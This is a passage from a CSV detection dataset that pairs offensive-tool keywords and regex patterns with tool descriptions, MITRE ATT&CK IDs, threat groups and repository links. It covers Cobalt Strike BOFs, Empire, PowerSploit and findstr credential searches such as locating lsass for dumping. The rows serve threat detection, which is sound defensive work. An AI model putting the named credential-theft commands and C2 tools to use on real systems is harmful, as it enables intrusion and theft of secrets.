T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","10","10","265","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" "*FindObjects-BOF*",".{0,1000}FindObjects\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","265","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" "*Find-PathDLLHijack*",".{0,1000}Find\-PathDLLHijack.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
"*Find-PathDLLHijack*",".{0,1000}Find\-PathDLLHijack.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*Find-PathDLLHijack*",".{0,1000}Find\-PathDLLHijack.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Find-PotentiallyCrackableAccounts.json*",".{0,1000}Find\-PotentiallyCrackableAccounts\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Find-ProcessDLLHijack*",".{0,1000}Find\-ProcessDLLHijack.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-ProcessDLLHijack*",".{0,1000}Find\-ProcessDLLHijack.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*Find-ProcessDLLHijack*",".{0,1000}Find\-ProcessDLLHijack.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*FindProcessTokenAndDuplicate*",".{0,1000}FindProcessTokenAndDuplicate.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*FindProcHandle *lsass*",".{0,1000}FindProcHandle\s.{0,1000}lsass.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 
- T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","10","10","265","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" "*Find-ProtectionSoftware*",".{0,1000}Find\-ProtectionSoftware.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Find-PSScriptsInPSAppLog*",".{0,1000}Find\-PSScriptsInPSAppLog.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-PSServiceAccounts.ps1*",".{0,1000}Find\-PSServiceAccounts\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Find-RDPClientConnections*",".{0,1000}Find\-RDPClientConnections.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-Secret -FilePath ./logs.txt -Regex *",".{0,1000}Find\-Secret\s\-FilePath\s\.\/logs\.txt\s\-Regex\s.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*FindSMB2UPTime.py*",".{0,1000}FindSMB2UPTime\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*Findsploit*",".{0,1000}Findsploit.{0,1000}","offensive_tool_keyword","Findsploit","Findsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes copysploit to copy any exploit-db exploit to the current directory and compilesploit to automatically compile and run any C exploit (i.e. ./copysploit 1337.c && ./compilesploit 1337.c)","T1210 - T1105 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/1N3/Findsploit","1","1","N/A","N/A","10","1549","319","2021-09-27T01:43:24Z","2015-03-16T16:15:55Z" "*findstr *BEGIN CERTIFICATE*",".{0,1000}findstr\s.{0,1000}BEGIN\sCERTIFICATE.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*findstr *confidential*",".{0,1000}findstr\s.{0,1000}confidential.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*findstr *net use*",".{0,1000}findstr\s.{0,1000}net\suse.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*findstr *password*",".{0,1000}findstr\s.{0,1000}password.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - 
T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*findstr lsass*",".{0,1000}findstr\slsass.{0,1000}","offensive_tool_keyword","findstr","findstr used to find lsass pid in order to dump lsass process","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*findstr.exe Tvndrgaaa*",".{0,1000}findstr\.exe\sTvndrgaaa.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Findsubdomains*",".{0,1000}Findsubdomains.{0,1000}","offensive_tool_keyword","findsubdomains","A subdomains discovery tool that collects all possible subdomains from open source internet and validates them through various tools to provide accurate results.","T1590 - T1591 - T1595 - T1596 - T1599","TA0011","N/A","N/A","Information 
Gathering","https://findsubdomains.com/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Find-TrustedDocuments*",".{0,1000}Find\-TrustedDocuments.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-TrustedDocuments.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-TrustedDocuments.ps1*",".{0,1000}Find\-TrustedDocuments\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1076","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*FindUncommonShares.git*",".{0,1000}FindUncommonShares\.git.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","371","43","2024-04-23T15:42:03Z","2021-10-06T12:30:16Z" 
"*FindUncommonShares.p*",".{0,1000}FindUncommonShares\.p.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*FindUncommonShares.py *",".{0,1000}FindUncommonShares\.py\s.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","371","43","2024-04-23T15:42:03Z","2021-10-06T12:30:16Z" "*FindUncommonShares-main*",".{0,1000}FindUncommonShares\-main.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","371","43","2024-04-23T15:42:03Z","2021-10-06T12:30:16Z" "*finduncshar_scan*",".{0,1000}finduncshar_scan.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Find-UnsafeLogonScriptPermissions.ps1*",".{0,1000}Find\-UnsafeLogonScriptPermissions\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and 
dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*Find-UnsafeUNCPermissions -UNCScripts*",".{0,1000}Find\-UnsafeUNCPermissions\s\-UNCScripts.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*Find-UnsafeUNCPermissions.ps1*",".{0,1000}Find\-UnsafeUNCPermissions\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*Find-UserField -SearchField *",".{0,1000}Find\-UserField\s\-SearchField\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-VacantComputer*",".{0,1000}Find\-VacantComputer.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
